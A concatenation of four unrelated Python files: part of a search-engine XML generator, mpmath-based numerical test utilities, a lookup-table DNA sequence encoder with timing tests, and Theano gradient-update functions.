def generateListForLocale(self, locale):
"""Creates a new locale specific donottranslate-search_engines.xml file.
The new file contains search engines specific to that country. If required
this function updates all_search_engines.xml file with any new search
engine data necessary.
"""
separator_pos = locale.find('-')
if separator_pos == -1:
print ('Locale must be of format <language>-<country>. For e.g.'
' "es-US" or "en-GB"')
return
language = locale[0:separator_pos]
country = locale[separator_pos + 1:].upper()
dir_path = os.path.join(self.resdir, 'values-' + language + '-r' + country)
self.writeEngineList(dir_path, country)
def writeEngineList(self, dir_path, country):
if os.path.exists(dir_path) and not os.path.isdir(dir_path):
print "File exists in output directory path " + dir_path + ". Please remove it and try again."
return
engines = self.getSearchEnginesForCountry(country)
if not engines:
return
for engine in engines:
self.all_engines.add(engine)
# Create the locale specific search_engines.xml file. Each
# search_engines.xml file has a hardcoded list of 7 items. If there are less
# than 7 search engines for this country, the remaining items are marked as
# enabled=false.
text = []
text.append(' <string-array name="search_engines">\n');
for engine in engines:
engine_data = self.getEngineData(engine)
name = engine_data[0]
text.append(' <item>%s</item>\n' % (name))
text.append(' </string-array>\n');
self.generateXmlFromTemplate(os.path.join(sys.path[0], 'search_engines.template.xml'),
os.path.join(dir_path, 'donottranslate-search_engines.xml'),
text)
def generateXmlFromTemplate(self, template_path, out_path, text):
# Load the template file and insert the new contents before the last line.
template_text = open(template_path).read()
pos = template_text.rfind('\n', 0, -2) + 1
contents = template_text[0:pos] + ''.join(text) + template_text[pos:]
# Make sure what we have created is valid XML :) No need to check for errors
# as the script will terminate with an exception if the XML was malformed.
engines_dom = minidom.parseString(contents)
dir_path = os.path.dirname(out_path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
print 'Created directory ' + dir_path
file = open(out_path, 'w')
file.write(contents)
file.close()
print 'Wrote ' + out_path
if __name__ == "__main__":
manager = SearchEngineManager()
manager.generateDefaultList()
for locale in locales:
manager.generateListForLocale(locale)
manager.writeAllEngines()
|
|
import os
import sys
import time
import numpy as np
from numpy.testing import assert_
import pytest
from scipy.special._testutils import assert_func_equal
try:
import mpmath # type: ignore[import]
except ImportError:
pass
# ------------------------------------------------------------------------------
# Machinery for systematic tests with mpmath
# ------------------------------------------------------------------------------
class Arg(object):
"""Generate a set of numbers on the real axis, concentrating on
'interesting' regions and covering all orders of magnitude.
"""
def __init__(self, a=-np.inf, b=np.inf, inclusive_a=True, inclusive_b=True):
if a > b:
raise ValueError("a should be less than or equal to b")
if a == -np.inf:
a = -0.5*np.finfo(float).max
if b == np.inf:
b = 0.5*np.finfo(float).max
self.a, self.b = a, b
self.inclusive_a, self.inclusive_b = inclusive_a, inclusive_b
def _positive_values(self, a, b, n):
if a < 0:
raise ValueError("a should be positive")
# Try to put half of the points into a linspace between a and
# 10 the other half in a logspace.
if n % 2 == 0:
nlogpts = n//2
nlinpts = nlogpts
else:
nlogpts = n//2
nlinpts = nlogpts + 1
if a >= 10:
# Outside of linspace range; just return a logspace.
pts = np.logspace(np.log10(a), np.log10(b), n)
elif a > 0 and b < 10:
# Outside of logspace range; just return a linspace
pts = np.linspace(a, b, n)
elif a > 0:
# Linspace between a and 10 and a logspace between 10 and
# b.
linpts = np.linspace(a, 10, nlinpts, endpoint=False)
logpts = np.logspace(1, np.log10(b), nlogpts)
pts = np.hstack((linpts, logpts))
elif a == 0 and b <= 10:
# Linspace between 0 and b and a logspace between 0 and
# the smallest positive point of the linspace
linpts = np.linspace(0, b, nlinpts)
if linpts.size > 1:
right = np.log10(linpts[1])
else:
right = -30
logpts = np.logspace(-30, right, nlogpts, endpoint=False)
pts = np.hstack((logpts, linpts))
else:
# Linspace between 0 and 10, logspace between 0 and the
# smallest positive point of the linspace, and a logspace
# between 10 and b.
if nlogpts % 2 == 0:
nlogpts1 = nlogpts//2
nlogpts2 = nlogpts1
else:
nlogpts1 = nlogpts//2
nlogpts2 = nlogpts1 + 1
linpts = np.linspace(0, 10, nlinpts, endpoint=False)
if linpts.size > 1:
right = np.log10(linpts[1])
else:
right = -30
logpts1 = np.logspace(-30, right, nlogpts1, endpoint=False)
logpts2 = np.logspace(1, np.log10(b), nlogpts2)
pts = np.hstack((logpts1, linpts, logpts2))
return np.sort(pts)
def values(self, n):
"""Return an array containing n numbers."""
a, b = self.a, self.b
if a == b:
return np.zeros(n)
if not self.inclusive_a:
n += 1
if not self.inclusive_b:
n += 1
if n % 2 == 0:
n1 = n//2
n2 = n1
else:
n1 = n//2
n2 = n1 + 1
if a >= 0:
pospts = self._positive_values(a, b, n)
negpts = []
elif b <= 0:
pospts = []
negpts = -self._positive_values(-b, -a, n)
else:
pospts = self._positive_values(0, b, n1)
negpts = -self._positive_values(0, -a, n2 + 1)
# Don't want to get zero twice
negpts = negpts[1:]
pts = np.hstack((negpts[::-1], pospts))
if not self.inclusive_a:
pts = pts[1:]
if not self.inclusive_b:
pts = pts[:-1]
return pts
class FixedArg(object):
def __init__(self, values):
self._values = np.asarray(values)
def values(self, n):
return self._values
class ComplexArg(object):
def __init__(self, a=complex(-np.inf, -np.inf), b=complex(np.inf, np.inf)):
self.real = Arg(a.real, b.real)
self.imag = Arg(a.imag, b.imag)
def values(self, n):
m = int(np.floor(np.sqrt(n)))
x = self.real.values(m)
y = self.imag.values(m + 1)
return (x[:,None] + 1j*y[None,:]).ravel()
class IntArg(object):
def __init__(self, a=-1000, b=1000):
self.a = a
self.b = b
def values(self, n):
v1 = Arg(self.a, self.b).values(max(1 + n//2, n-5)).astype(int)
v2 = np.arange(-5, 5)
v = np.unique(np.r_[v1, v2])
v = v[(v >= self.a) & (v < self.b)]
return v
def get_args(argspec, n):
if isinstance(argspec, np.ndarray):
args = argspec.copy()
else:
nargs = len(argspec)
ms = np.asarray([1.5 if isinstance(spec, ComplexArg) else 1.0 for spec in argspec])
ms = (n**(ms/sum(ms))).astype(int) + 1
args = [spec.values(m) for spec, m in zip(argspec, ms)]
args = np.array(np.broadcast_arrays(*np.ix_(*args))).reshape(nargs, -1).T
return args
class MpmathData(object):
def __init__(self, scipy_func, mpmath_func, arg_spec, name=None,
dps=None, prec=None, n=None, rtol=1e-7, atol=1e-300,
ignore_inf_sign=False, distinguish_nan_and_inf=True,
nan_ok=True, param_filter=None):
# mpmath tests are really slow (see gh-6989). Use a small number of
# points by default, increase back to 5000 (old default) if XSLOW is
# set
if n is None:
try:
is_xslow = int(os.environ.get('SCIPY_XSLOW', '0'))
except ValueError:
is_xslow = False
n = 5000 if is_xslow else 500
self.scipy_func = scipy_func
self.mpmath_func = mpmath_func
self.arg_spec = arg_spec
self.dps = dps
self.prec = prec
self.n = n
self.rtol = rtol
self.atol = atol
self.ignore_inf_sign = ignore_inf_sign
self.nan_ok = nan_ok
if isinstance(self.arg_spec, np.ndarray):
self.is_complex = np.issubdtype(self.arg_spec.dtype, np.complexfloating)
else:
self.is_complex = any([isinstance(arg, ComplexArg) for arg in self.arg_spec])
self.ignore_inf_sign = ignore_inf_sign
self.distinguish_nan_and_inf = distinguish_nan_and_inf
if not name or name == '<lambda>':
name = getattr(scipy_func, '__name__', None)
if not name or name == '<lambda>':
name = getattr(mpmath_func, '__name__', None)
self.name = name
self.param_filter = param_filter
def check(self):
np.random.seed(1234)
# Generate values for the arguments
argarr = get_args(self.arg_spec, self.n)
# Check
old_dps, old_prec = mpmath.mp.dps, mpmath.mp.prec
try:
if self.dps is not None:
dps_list = [self.dps]
else:
dps_list = [20]
if self.prec is not None:
mpmath.mp.prec = self.prec
# Proper casting of mpmath input and output types. Using
# native mpmath types as inputs gives improved precision
# in some cases.
if np.issubdtype(argarr.dtype, np.complexfloating):
pytype = mpc2complex
def mptype(x):
return mpmath.mpc(complex(x))
else:
def mptype(x):
return mpmath.mpf(float(x))
def pytype(x):
if abs(x.imag) > 1e-16*(1 + abs(x.real)):
return np.nan
else:
return mpf2float(x.real)
# Try out different dps until one (or none) works
for j, dps in enumerate(dps_list):
mpmath.mp.dps = dps
try:
assert_func_equal(self.scipy_func,
lambda *a: pytype(self.mpmath_func(*map(mptype, a))),
argarr,
vectorized=False,
rtol=self.rtol, atol=self.atol,
ignore_inf_sign=self.ignore_inf_sign,
distinguish_nan_and_inf=self.distinguish_nan_and_inf,
nan_ok=self.nan_ok,
param_filter=self.param_filter)
break
except AssertionError:
if j >= len(dps_list)-1:
# reraise the Exception
tp, value, tb = sys.exc_info()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
finally:
mpmath.mp.dps, mpmath.mp.prec = old_dps, old_prec
def __repr__(self):
if self.is_complex:
return "<MpmathData: %s (complex)>" % (self.name,)
else:
return "<MpmathData: %s>" % (self.name,)
def assert_mpmath_equal(*a, **kw):
d = MpmathData(*a, **kw)
d.check()
def nonfunctional_tooslow(func):
return pytest.mark.skip(reason=" Test not yet functional (too slow), needs more work.")(func)
# ------------------------------------------------------------------------------
# Tools for dealing with mpmath quirks
# ------------------------------------------------------------------------------
def mpf2float(x):
"""
Convert an mpf to the nearest floating point number. Just using
float directly doesn't work because of results like this:
with mp.workdps(50):
float(mpf("0.99999999999999999")) = 0.9999999999999999
"""
return float(mpmath.nstr(x, 17, min_fixed=0, max_fixed=0))
def mpc2complex(x):
return complex(mpf2float(x.real), mpf2float(x.imag))
def trace_args(func):
def tofloat(x):
if isinstance(x, mpmath.mpc):
return complex(x)
else:
return float(x)
def wrap(*a, **kw):
sys.stderr.write("%r: " % (tuple(map(tofloat, a)),))
sys.stderr.flush()
try:
r = func(*a, **kw)
sys.stderr.write("-> %r" % r)
finally:
sys.stderr.write("\n")
sys.stderr.flush()
return r
return wrap
try:
import posix
import signal
POSIX = ('setitimer' in dir(signal))
except ImportError:
POSIX = False
class TimeoutError(Exception):
pass
def time_limited(timeout=0.5, return_val=np.nan, use_sigalrm=True):
"""
Decorator for setting a timeout for pure-Python functions.
If the function does not return within `timeout` seconds, the
value `return_val` is returned instead.
On POSIX this uses SIGALRM by default. On non-POSIX, settrace is
used. Do not use this with threads: the SIGALRM implementation
does probably not work well. The settrace implementation only
traces the current thread.
The settrace implementation slows down execution speed. Slowdown
by a factor around 10 is probably typical.
"""
if POSIX and use_sigalrm:
def sigalrm_handler(signum, frame):
raise TimeoutError()
def deco(func):
def wrap(*a, **kw):
old_handler = signal.signal(signal.SIGALRM, sigalrm_handler)
signal.setitimer(signal.ITIMER_REAL, timeout)
try:
return func(*a, **kw)
except TimeoutError:
return return_val
finally:
signal.setitimer(signal.ITIMER_REAL, 0)
signal.signal(signal.SIGALRM, old_handler)
return wrap
else:
def deco(func):
def wrap(*a, **kw):
start_time = time.time()
def trace(frame, event, arg):
if time.time() - start_time > timeout:
raise TimeoutError()
return trace
sys.settrace(trace)
try:
return func(*a, **kw)
except TimeoutError:
sys.settrace(None)
return return_val
finally:
sys.settrace(None)
return wrap
return deco
def exception_to_nan(func):
"""Decorate function to return nan if it raises an exception"""
def wrap(*a, **kw):
try:
return func(*a, **kw)
except Exception:
return np.nan
return wrap
def inf_to_nan(func):
"""Decorate function to return nan if it returns inf"""
def wrap(*a, **kw):
v = func(*a, **kw)
if not np.isfinite(v):
return np.nan
return v
return wrap
def mp_assert_allclose(res, std, atol=0, rtol=1e-17):
"""
Compare lists of mpmath.mpf's or mpmath.mpc's directly so that it
can be done to higher precision than double.
"""
try:
len(res)
except TypeError:
res = list(res)
n = len(std)
if len(res) != n:
raise AssertionError("Lengths of inputs not equal.")
failures = []
for k in range(n):
try:
assert_(mpmath.fabs(res[k] - std[k]) <= atol + rtol*mpmath.fabs(std[k]))
except AssertionError:
failures.append(k)
ndigits = int(abs(np.log10(rtol)))
msg = [""]
msg.append("Bad results ({} out of {}) for the following points:"
.format(len(failures), n))
for k in failures:
resrep = mpmath.nstr(res[k], ndigits, min_fixed=0, max_fixed=0)
stdrep = mpmath.nstr(std[k], ndigits, min_fixed=0, max_fixed=0)
if std[k] == 0:
rdiff = "inf"
else:
rdiff = mpmath.fabs((res[k] - std[k])/std[k])
rdiff = mpmath.nstr(rdiff, 3)
msg.append("{}: {} != {} (rdiff {})".format(k, resrep, stdrep, rdiff))
if failures:
assert_(False, "\n".join(msg))
|
|
'''
binary.py
Methods to translate DNA sequences to integers via binary
intermediates (for more efficient memory usage)
'''
# Lookup tables
_LUTsb = {'AAAA':0x0,'AAAC':0x1,'AAAG':0x2,'AAAT':0x3,'AACA':0x4,'AACC':0x5,
'AACG':0x6,'AACT':0x7,'AAGA':0x8,'AAGC':0x9,'AAGG':0xa,'AAGT':0xb,'AATA':0xc,
'AATC':0xd,'AATG':0xe,'AATT':0xf,'ACAA':0x10,'ACAC':0x11,'ACAG':0x12,
'ACAT':0x13,'ACCA':0x14,'ACCC':0x15,'ACCG':0x16,'ACCT':0x17,'ACGA':0x18,
'ACGC':0x19,'ACGG':0x1a,'ACGT':0x1b,'ACTA':0x1c,'ACTC':0x1d,'ACTG':0x1e,
'ACTT':0x1f,'AGAA':0x20,'AGAC':0x21,'AGAG':0x22,'AGAT':0x23,'AGCA':0x24,
'AGCC':0x25,'AGCG':0x26,'AGCT':0x27,'AGGA':0x28,'AGGC':0x29,'AGGG':0x2a,
'AGGT':0x2b,'AGTA':0x2c,'AGTC':0x2d,'AGTG':0x2e,'AGTT':0x2f,'ATAA':0x30,
'ATAC':0x31,'ATAG':0x32,'ATAT':0x33,'ATCA':0x34,'ATCC':0x35,'ATCG':0x36,
'ATCT':0x37,'ATGA':0x38,'ATGC':0x39,'ATGG':0x3a,'ATGT':0x3b,'ATTA':0x3c,
'ATTC':0x3d,'ATTG':0x3e,'ATTT':0x3f,'CAAA':0x40,'CAAC':0x41,'CAAG':0x42,
'CAAT':0x43,'CACA':0x44,'CACC':0x45,'CACG':0x46,'CACT':0x47,'CAGA':0x48,
'CAGC':0x49,'CAGG':0x4a,'CAGT':0x4b,'CATA':0x4c,'CATC':0x4d,'CATG':0x4e,
'CATT':0x4f,'CCAA':0x50,'CCAC':0x51,'CCAG':0x52,'CCAT':0x53,'CCCA':0x54,
'CCCC':0x55,'CCCG':0x56,'CCCT':0x57,'CCGA':0x58,'CCGC':0x59,'CCGG':0x5a,
'CCGT':0x5b,'CCTA':0x5c,'CCTC':0x5d,'CCTG':0x5e,'CCTT':0x5f,'CGAA':0x60,
'CGAC':0x61,'CGAG':0x62,'CGAT':0x63,'CGCA':0x64,'CGCC':0x65,'CGCG':0x66,
'CGCT':0x67,'CGGA':0x68,'CGGC':0x69,'CGGG':0x6a,'CGGT':0x6b,'CGTA':0x6c,
'CGTC':0x6d,'CGTG':0x6e,'CGTT':0x6f,'CTAA':0x70,'CTAC':0x71,'CTAG':0x72,
'CTAT':0x73,'CTCA':0x74,'CTCC':0x75,'CTCG':0x76,'CTCT':0x77,'CTGA':0x78,
'CTGC':0x79,'CTGG':0x7a,'CTGT':0x7b,'CTTA':0x7c,'CTTC':0x7d,'CTTG':0x7e,
'CTTT':0x7f,'GAAA':0x80,'GAAC':0x81,'GAAG':0x82,'GAAT':0x83,'GACA':0x84,
'GACC':0x85,'GACG':0x86,'GACT':0x87,'GAGA':0x88,'GAGC':0x89,'GAGG':0x8a,
'GAGT':0x8b,'GATA':0x8c,'GATC':0x8d,'GATG':0x8e,'GATT':0x8f,'GCAA':0x90,
'GCAC':0x91,'GCAG':0x92,'GCAT':0x93,'GCCA':0x94,'GCCC':0x95,'GCCG':0x96,
'GCCT':0x97,'GCGA':0x98,'GCGC':0x99,'GCGG':0x9a,'GCGT':0x9b,'GCTA':0x9c,
'GCTC':0x9d,'GCTG':0x9e,'GCTT':0x9f,'GGAA':0xa0,'GGAC':0xa1,'GGAG':0xa2,
'GGAT':0xa3,'GGCA':0xa4,'GGCC':0xa5,'GGCG':0xa6,'GGCT':0xa7,'GGGA':0xa8,
'GGGC':0xa9,'GGGG':0xaa,'GGGT':0xab,'GGTA':0xac,'GGTC':0xad,'GGTG':0xae,
'GGTT':0xaf,'GTAA':0xb0,'GTAC':0xb1,'GTAG':0xb2,'GTAT':0xb3,'GTCA':0xb4,
'GTCC':0xb5,'GTCG':0xb6,'GTCT':0xb7,'GTGA':0xb8,'GTGC':0xb9,'GTGG':0xba,
'GTGT':0xbb,'GTTA':0xbc,'GTTC':0xbd,'GTTG':0xbe,'GTTT':0xbf,'TAAA':0xc0,
'TAAC':0xc1,'TAAG':0xc2,'TAAT':0xc3,'TACA':0xc4,'TACC':0xc5,'TACG':0xc6,
'TACT':0xc7,'TAGA':0xc8,'TAGC':0xc9,'TAGG':0xca,'TAGT':0xcb,'TATA':0xcc,
'TATC':0xcd,'TATG':0xce,'TATT':0xcf,'TCAA':0xd0,'TCAC':0xd1,'TCAG':0xd2,
'TCAT':0xd3,'TCCA':0xd4,'TCCC':0xd5,'TCCG':0xd6,'TCCT':0xd7,'TCGA':0xd8,
'TCGC':0xd9,'TCGG':0xda,'TCGT':0xdb,'TCTA':0xdc,'TCTC':0xdd,'TCTG':0xde,
'TCTT':0xdf,'TGAA':0xe0,'TGAC':0xe1,'TGAG':0xe2,'TGAT':0xe3,'TGCA':0xe4,
'TGCC':0xe5,'TGCG':0xe6,'TGCT':0xe7,'TGGA':0xe8,'TGGC':0xe9,'TGGG':0xea,
'TGGT':0xeb,'TGTA':0xec,'TGTC':0xed,'TGTG':0xee,'TGTT':0xef,'TTAA':0xf0,
'TTAC':0xf1,'TTAG':0xf2,'TTAT':0xf3,'TTCA':0xf4,'TTCC':0xf5,'TTCG':0xf6,
'TTCT':0xf7,'TTGA':0xf8,'TTGC':0xf9,'TTGG':0xfa,'TTGT':0xfb,'TTTA':0xfc,
'TTTC':0xfd,'TTTG':0xfe,'TTTT':0xff}
_LUTis = ['AAAA','AAAC','AAAG','AAAT','AACA','AACC','AACG','AACT','AAGA','AAGC',
'AAGG','AAGT','AATA','AATC','AATG','AATT','ACAA','ACAC','ACAG','ACAT','ACCA',
'ACCC','ACCG','ACCT','ACGA','ACGC','ACGG','ACGT','ACTA','ACTC','ACTG','ACTT',
'AGAA','AGAC','AGAG','AGAT','AGCA','AGCC','AGCG','AGCT','AGGA','AGGC','AGGG',
'AGGT','AGTA','AGTC','AGTG','AGTT','ATAA','ATAC','ATAG','ATAT','ATCA','ATCC',
'ATCG','ATCT','ATGA','ATGC','ATGG','ATGT','ATTA','ATTC','ATTG','ATTT','CAAA',
'CAAC','CAAG','CAAT','CACA','CACC','CACG','CACT','CAGA','CAGC','CAGG','CAGT',
'CATA','CATC','CATG','CATT','CCAA','CCAC','CCAG','CCAT','CCCA','CCCC','CCCG',
'CCCT','CCGA','CCGC','CCGG','CCGT','CCTA','CCTC','CCTG','CCTT','CGAA','CGAC',
'CGAG','CGAT','CGCA','CGCC','CGCG','CGCT','CGGA','CGGC','CGGG','CGGT','CGTA',
'CGTC','CGTG','CGTT','CTAA','CTAC','CTAG','CTAT','CTCA','CTCC','CTCG','CTCT',
'CTGA','CTGC','CTGG','CTGT','CTTA','CTTC','CTTG','CTTT','GAAA','GAAC','GAAG',
'GAAT','GACA','GACC','GACG','GACT','GAGA','GAGC','GAGG','GAGT','GATA','GATC',
'GATG','GATT','GCAA','GCAC','GCAG','GCAT','GCCA','GCCC','GCCG','GCCT','GCGA',
'GCGC','GCGG','GCGT','GCTA','GCTC','GCTG','GCTT','GGAA','GGAC','GGAG','GGAT',
'GGCA','GGCC','GGCG','GGCT','GGGA','GGGC','GGGG','GGGT','GGTA','GGTC','GGTG',
'GGTT','GTAA','GTAC','GTAG','GTAT','GTCA','GTCC','GTCG','GTCT','GTGA','GTGC',
'GTGG','GTGT','GTTA','GTTC','GTTG','GTTT','TAAA','TAAC','TAAG','TAAT','TACA',
'TACC','TACG','TACT','TAGA','TAGC','TAGG','TAGT','TATA','TATC','TATG','TATT',
'TCAA','TCAC','TCAG','TCAT','TCCA','TCCC','TCCG','TCCT','TCGA','TCGC','TCGG',
'TCGT','TCTA','TCTC','TCTG','TCTT','TGAA','TGAC','TGAG','TGAT','TGCA','TGCC',
'TGCG','TGCT','TGGA','TGGC','TGGG','TGGT','TGTA','TGTC','TGTG','TGTT','TTAA',
'TTAC','TTAG','TTAT','TTCA','TTCC','TTCG','TTCT','TTGA','TTGC','TTGG','TTGT',
'TTTA','TTTC','TTTG','TTTT']
_LUTic = bytearray(b'\xff\xfe\xfd\xfc\xfb\xfa\xf9\xf8\xf7\xf6\xf5\xf4\xf3\xf2'
'\xf1\xf0\xef\xee\xed\xec\xeb\xea\xe9\xe8\xe7\xe6\xe5\xe4\xe3\xe2\xe1\xe0\xdf'
'\xde\xdd\xdc\xdb\xda\xd9\xd8\xd7\xd6\xd5\xd4\xd3\xd2\xd1\xd0\xcf\xce\xcd\xcc'
'\xcb\xca\xc9\xc8\xc7\xc6\xc5\xc4\xc3\xc2\xc1\xc0\xbf\xbe\xbd\xbc\xbb\xba\xb9'
'\xb8\xb7\xb6\xb5\xb4\xb3\xb2\xb1\xb0\xaf\xae\xad\xac\xab\xaa\xa9\xa8\xa7\xa6'
'\xa5\xa4\xa3\xa2\xa1\xa0\x9f\x9e\x9d\x9c\x9b\x9a\x99\x98\x97\x96\x95\x94\x93'
'\x92\x91\x90\x8f\x8e\x8d\x8c\x8b\x8a\x89\x88\x87\x86\x85\x84\x83\x82\x81\x80'
'\x7f~}|{zyxwvutsrqponmlkjihgfedcba`_^]\\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:987'
'6543210/.-,+*)(\'&%$#"! \x1f\x1e\x1d\x1c\x1b\x1a\x19\x18\x17\x16\x15\x14\x13'
'\x12\x11\x10\x0f\x0e\r\x0c\x0b\n\t\x08\x07\x06\x05\x04\x03\x02\x01\x00')
_LUTir = bytearray(b'\x00@\x80\xc0\x10P\x90\xd0 `\xa0\xe00p\xb0\xf0\x04D\x84'
'\xc4\x14T\x94\xd4$d\xa4\xe44t\xb4\xf4\x08H\x88\xc8\x18X\x98\xd8(h\xa8\xe88x'
'\xb8\xf8\x0cL\x8c\xcc\x1c\\\x9c\xdc,l\xac\xec<|\xbc\xfc\x01A\x81\xc1\x11Q\x91'
'\xd1!a\xa1\xe11q\xb1\xf1\x05E\x85\xc5\x15U\x95\xd5%e\xa5\xe55u\xb5\xf5\tI\x89'
'\xc9\x19Y\x99\xd9)i\xa9\xe99y\xb9\xf9\rM\x8d\xcd\x1d]\x9d\xdd-m\xad\xed=}\xbd'
'\xfd\x02B\x82\xc2\x12R\x92\xd2"b\xa2\xe22r\xb2\xf2\x06F\x86\xc6\x16V\x96\xd6&f'
'\xa6\xe66v\xb6\xf6\nJ\x8a\xca\x1aZ\x9a\xda*j\xaa\xea:z\xba\xfa\x0eN\x8e\xce'
'\x1e^\x9e\xde.n\xae\xee>~\xbe\xfe\x03C\x83\xc3\x13S\x93\xd3#c\xa3\xe33s\xb3'
'\xf3\x07G\x87\xc7\x17W\x97\xd7\'g\xa7\xe77w\xb7\xf7\x0bK\x8b\xcb\x1b[\x9b'
'\xdb+k\xab\xeb;{\xbb\xfb\x0fO\x8f\xcf\x1f_\x9f\xdf/o\xaf\xef?\x7f\xbf\xff')
_LUTirc = bytearray(b'\xff\xbf\x7f?\xef\xafo/\xdf\x9f_\x1f\xcf\x8fO\x0f\xfb\xbb'
'{;\xeb\xabk+\xdb\x9b[\x1b\xcb\x8bK\x0b\xf7\xb7w7\xe7\xa7g\'\xd7\x97W\x17\xc7'
'\x87G\x07\xf3\xb3s3\xe3\xa3c#\xd3\x93S\x13\xc3\x83C\x03\xfe\xbe~>\xee\xaen.'
'\xde\x9e^\x1e\xce\x8eN\x0e\xfa\xbaz:\xea\xaaj*\xda\x9aZ\x1a\xca\x8aJ\n\xf6'
'\xb6v6\xe6\xa6f&\xd6\x96V\x16\xc6\x86F\x06\xf2\xb2r2\xe2\xa2b"\xd2\x92R\x12'
'\xc2\x82B\x02\xfd\xbd}=\xed\xadm-\xdd\x9d]\x1d\xcd\x8dM\r\xf9\xb9y9\xe9\xa9i)'
'\xd9\x99Y\x19\xc9\x89I\t\xf5\xb5u5\xe5\xa5e%\xd5\x95U\x15\xc5\x85E\x05\xf1'
'\xb1q1\xe1\xa1a!\xd1\x91Q\x11\xc1\x81A\x01\xfc\xbc|<\xec\xacl,\xdc\x9c\\\x1c'
'\xcc\x8cL\x0c\xf8\xb8x8\xe8\xa8h(\xd8\x98X\x18\xc8\x88H\x08\xf4\xb4t4\xe4'
'\xa4d$\xd4\x94T\x14\xc4\x84D\x04\xf0\xb0p0\xe0\xa0` \xd0\x90P\x10\xc0\x80@'
'\x00')
class Basic:
''' Encodes DNA sequences without a lookup table '''
_seq_bin = {'A':'00', 'T':'11', 'U':'11', 'G':'10', 'C':'01'}
_bin_seq_dna = {'00':'A', '11':'T', '10':'G', '01':'C'}
_bin_seq_rna = {'00':'A', '11':'U', '10':'G', '01':'C'}
@staticmethod
def _seq_to_bin(seq):
return ''.join([Basic._seq_bin[b] for b in seq])
@staticmethod
def _bin_to_seq(binary, na_type='DNA'):
to_seq = Basic._bin_seq_dna if na_type == 'DNA' else Basic._bin_seq_rna
return ''.join([to_seq[binary[x:x+2]] for x in
xrange(0, len(binary)-1, 2)])
@staticmethod
def decode(integer, length, na_type='DNA'):
b = bin(integer)[2:]
b_padded = '0' * (length * 2 - len(b)) + b
return Basic._bin_to_seq(b_padded, na_type=na_type)
@staticmethod
def encode(seq):
''' Returns an integer representation of seq as well as its length '''
return int(Basic._seq_to_bin(seq), 2), len(seq)
class BinarySeq:
'''
Encodes DNA sequences with a lookup table and performs basic operations
(complement, reverse, reverse-complement)
'''
@staticmethod
def encode(seq):
sb = _LUTsb#_seq_byte
L = len(seq)
pad = 4 - ((L % 4) or 4)
seq += pad * 'A'
return bytearray([pad] + [sb[seq[b:b+4]] for b in xrange(0, L, 4)])
@staticmethod
def decode(seq_ba):
ts = _LUTis
offset = seq_ba[0]
front = offset & 0x04
idx = offset & 0x03
# if rear == 4 then offset is from front, else the rear
if front:
start = idx
stop = None
else:
start = 0
stop = -idx or None
return ''.join([ts[val] for val in seq_ba[1:]])[start:stop]
@staticmethod
def rev(seq_ba):
r = _LUTir
L = len(seq_ba)
for i in xrange(L/2-1):
seq_ba[1+i], seq_ba[-i-1] = r[seq_ba[-i-1]], r[seq_ba[1+i]]
if L % 2:
seq_ba[L/2+1] = r[seq_ba[L/2+1]]
seq_ba[0] = (seq_ba[0] ^ 0x04)
return seq_ba
@staticmethod
def rev_compl(seq_ba):
rc = _LUTirc
L = len(seq_ba)
for i in xrange(L/2-1):
seq_ba[1+i], seq_ba[-i-1] = rc[seq_ba[-i-1]], rc[seq_ba[1+i]]
if L % 2:
seq_ba[L/2+1] = rc[seq_ba[L/2+1]]
seq_ba[0] = (seq_ba[0] ^ 0x04)
return seq_ba
@staticmethod
def compl(seq_ba):
c = _LUTic
for i in xrange(1, len(seq_ba)):
seq_ba[i] = c[seq_ba[i]]
return seq_ba
##### Test code below #####
if __name__ == '__main__':
import random
import cProfile
import timeit
def testBasic():
global rseq_out
for x in xrange(10000):
a = Basic.encode(rseq)
rseq_out = Basic.decode(*a)
def testBinarySeq():
global rseq_out
for x in xrange(10000):
enc = BinarySeq.encode(rseq)
rseq_out = BinarySeq.decode(enc)
print '-->Timed 10000X for 25mer:'
rseq = ''.join([random.choice('ATGC') for x in xrange(25)])
a = timeit.Timer('testBasic()', 'from __main__ import testBasic')
print 'Basic:', a.timeit(1)
c = timeit.Timer('testBinarySeq()', 'from __main__ import testBinarySeq')
print 'BinarySeq:', c.timeit(1)
# cProfile.run('testBasic()')
# cProfile.run('testBinarySeq()')
print '\n--->Timed 10000X for 500mer:'
rseq = ''.join([random.choice('ATGC') for x in xrange(500)])
a = timeit.Timer('testBasic()', 'from __main__ import testBasic')
print 'Basic:', a.timeit(1)
c = timeit.Timer('testBinarySeq()', 'from __main__ import testBinarySeq')
print 'BinarySeq:', c.timeit(1)
# cProfile.run('testBasic()')
# cProfile.run('testBinarySeq()')
print '\nFull test suite with BinarySeq: '
rseq = ''.join([random.choice('ATGC') for x in xrange(random.randint(20,30))])
print 'random_seq_in:\t\t\t', rseq
enc = BinarySeq.encode(rseq)
print 'random_seq_out:\t\t\t', BinarySeq.decode(enc)
enc = BinarySeq.encode(rseq)
print 'random_seq_compl:\t\t', BinarySeq.decode(BinarySeq.compl(enc))
enc = BinarySeq.encode(rseq)
print 'random_seq_rev:\t\t\t', BinarySeq.decode(BinarySeq.rev(enc))
enc = BinarySeq.encode(rseq)
print 'random_seq_rev_compl:\t', BinarySeq.decode(BinarySeq.rev_compl(enc))
|
|
"""
Functions to generate Theano update dictionaries for training.
"""
import numpy as np
import theano
import theano.tensor as T
def sgd(loss, all_params, learning_rate):
all_grads = theano.grad(loss, all_params)
updates = []
for param_i, grad_i in zip(all_params, all_grads):
updates.append((param_i, param_i - learning_rate * grad_i))
return updates
def momentum(loss, all_params, learning_rate, momentum=0.9):
all_grads = theano.grad(loss, all_params)
updates = []
for param_i, grad_i in zip(all_params, all_grads):
mparam_i = theano.shared(np.zeros(param_i.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param_i.broadcastable)
v = momentum * mparam_i - learning_rate * grad_i
updates.append((mparam_i, v))
updates.append((param_i, param_i + v))
return updates
# using the alternative formulation of nesterov momentum described at
# https://github.com/lisa-lab/pylearn2/pull/136
# such that the gradient can be evaluated at the current parameters.
def nesterov_momentum(loss, all_params, learning_rate, momentum=0.9):
all_grads = theano.grad(loss, all_params)
updates = []
for param_i, grad_i in zip(all_params, all_grads):
mparam_i = theano.shared(np.zeros(param_i.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param_i.broadcastable)
v = momentum * mparam_i - learning_rate * grad_i # new momemtum
w = param_i + momentum * v - learning_rate * grad_i # new param values
updates.append((mparam_i, v))
updates.append((param_i, w))
return updates
